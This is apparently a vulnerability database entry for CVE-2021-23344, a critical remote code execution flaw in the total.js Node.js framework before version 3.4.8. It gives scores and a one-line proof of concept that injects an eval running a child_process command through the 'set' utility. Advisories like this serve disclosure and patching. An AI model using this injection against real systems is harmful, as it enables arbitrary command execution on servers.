CVE-2021-23344
CRITICAL9.8EPSS 12.7%total.js Remote Code Execution Vulnerability
發布日:2021/3/19修改日:2026/3/13
描述
total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application. Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`. ### PoC ```js // To be run in a nodejs console: require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//') ```
受影響套件(1)
- npm/total.jsfrom 0, < 3.4.8
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |